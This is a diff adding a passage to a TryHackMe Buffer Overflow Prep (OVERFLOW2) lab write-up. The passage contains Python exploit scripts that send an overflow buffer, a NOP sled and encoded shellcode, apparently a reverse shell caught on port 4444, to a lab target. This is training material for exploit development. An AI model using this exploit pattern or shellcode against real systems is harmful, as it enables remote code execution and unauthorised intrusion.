--- a/TryHackMe/Buffer_Overflow_Prep/2.md
+++ b/TryHackMe/Buffer_Overflow_Prep/2.md
@@ -250,3 +250,95 @@ whereas our initial payload size shows a space of 332 bytes:
 
 ![image](https://user-images.githubusercontent.com/83407557/185278129-6032d5bd-db98-441e-a15d-27e0201c873a.png)
 
+Before sending over the final exploit I want to see if I can rerun replicate_crash.py again, but this time seeing if 353 bytes with a 16 byte NOP sled will fit:
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.249.184"
+port = 1337
+
+prefix = "OVERFLOW2 "
+offset = 634
+overflow = "A" * offset
+retn = "BBBB"
+padding = ""
+payload = "C" * (353 + 16)
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+
+```
+
+I verify that all my C's show up
+
+![image](https://user-images.githubusercontent.com/83407557/185278708-6487c3d7-53aa-4d04-b7e6-64de66e2dafb.png)
+
+
+With this I can create the final exploit.py
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.249.184"
+port = 1337
+
+prefix = "OVERFLOW2 "
+offset = 634
+overflow = "A" * offset
+retn = "BBBB"
+padding = "\x90" * 16
+payload = ("\xfc\xbb\xe1\x4c\x96\x35\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
+"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x1d\xa4\x14\x35\xdd"
+"\x35\x79\xbf\x38\x04\xb9\xdb\x49\x37\x09\xaf\x1f\xb4\xe2\xfd"
+"\x8b\x4f\x86\x29\xbc\xf8\x2d\x0c\xf3\xf9\x1e\x6c\x92\x79\x5d"
+"\xa1\x74\x43\xae\xb4\x75\x84\xd3\x35\x27\x5d\x9f\xe8\xd7\xea"
+"\xd5\x30\x5c\xa0\xf8\x30\x81\x71\xfa\x11\x14\x09\xa5\xb1\x97"
+"\xde\xdd\xfb\x8f\x03\xdb\xb2\x24\xf7\x97\x44\xec\xc9\x58\xea"
+"\xd1\xe5\xaa\xf2\x16\xc1\x54\x81\x6e\x31\xe8\x92\xb5\x4b\x36"
+"\x16\x2d\xeb\xbd\x80\x89\x0d\x11\x56\x5a\x01\xde\x1c\x04\x06"
+"\xe1\xf1\x3f\x32\x6a\xf4\xef\xb2\x28\xd3\x2b\x9e\xeb\x7a\x6a"
+"\x7a\x5d\x82\x6c\x25\x02\x26\xe7\xc8\x57\x5b\xaa\x84\x94\x56"
+"\x54\x55\xb3\xe1\x27\x67\x1c\x5a\xaf\xcb\xd5\x44\x28\x2b\xcc"
+"\x31\xa6\xd2\xef\x41\xef\x10\xbb\x11\x87\xb1\xc4\xf9\x57\x3d"
+"\x11\xad\x07\x91\xca\x0e\xf7\x51\xbb\xe6\x1d\x5e\xe4\x17\x1e"
+"\xb4\x8d\xb2\xe5\x5f\xb8\x44\xa8\xb9\xd4\x4a\x32\xd7\x78\xc2"
+"\xd4\xbd\x90\x82\x4f\x2a\x08\x8f\x1b\xcb\xd5\x05\x66\xcb\x5e"
+"\xaa\x97\x82\x96\xc7\x8b\x73\x57\x92\xf1\xd2\x68\x08\x9d\xb9"
+"\xfb\xd7\x5d\xb7\xe7\x4f\x0a\x90\xd6\x99\xde\x0c\x40\x30\xfc"
+"\xcc\x14\x7b\x44\x0b\xe5\x82\x45\xde\x51\xa1\x55\x26\x59\xed"
+"\x01\xf6\x0c\xbb\xff\xb0\xe6\x0d\xa9\x6a\x54\xc4\x3d\xea\x96"
+"\xd7\x3b\xf3\xf2\xa1\xa3\x42\xab\xf7\xdc\x6b\x3b\xf0\xa5\x91"
+"\xdb\xff\x7c\x12\xfb\x1d\x54\x6f\x94\xbb\x3d\xd2\xf9\x3b\xe8"
+"\x11\x04\xb8\x18\xea\xf3\xa0\x69\xef\xb8\x66\x82\x9d\xd1\x02"
+"\xa4\x32\xd1\x06\xa4\xb4\x2d\xa9")
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+
+```
+
+I reset the application on the target, start a listener on port 4444 from kali and execute exploit.py
+
